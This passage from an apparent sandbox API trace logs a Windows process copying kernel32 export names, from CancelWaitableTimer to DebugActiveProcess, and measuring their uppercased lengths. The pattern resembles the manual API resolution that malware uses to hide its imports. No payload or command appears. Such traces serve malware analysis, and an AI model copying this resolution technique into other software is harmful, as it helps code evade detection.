returned 21 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.642] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.642] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.642] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.642] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.642] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.642] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.642] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.642] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.642] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.642] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.642] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.642] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.642] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.642] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.642] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.642] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.642] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.643] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.643] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.643] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.643] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.643] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.643] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.643] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.643] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.643] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.643] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.643] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.643] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.643] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.643] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.643] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.643] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.643] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.643] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.644] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.644] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.644] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.644] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.644] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.644] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.644] lstrlenA (lpString="COPYFILEA") returned 9 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.644] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.644] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.644] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.644] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.644] lstrlenA (lpString="COPYFILEW") returned 9 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.644] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.644] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.644] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.644] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.644] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.644] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.645] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.645] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.645] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.645] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.645] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.645] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.645] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.645] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.645] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.645] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.645] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.645] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.645] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.645] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.645] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.645] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.645] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.645] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.646] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.646] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.646] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.646] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.646] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.646] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.646] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.646] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.646] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.646] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.646] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.646] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.646] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.646] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.646] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.646] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.646] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.646] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.647] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.647] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.647] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.647] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.647] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.647] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.647] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.647] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.647] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.647] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.647] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.647] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.647] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.647] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.647] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.647] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.647] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.647] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.647] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.648] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.648] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.648] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.648] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.648] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.648] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.648] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.648] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.648] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.648] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.648] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.648] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.648] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.648] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.648] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.648] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.648] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.648] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.649] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: 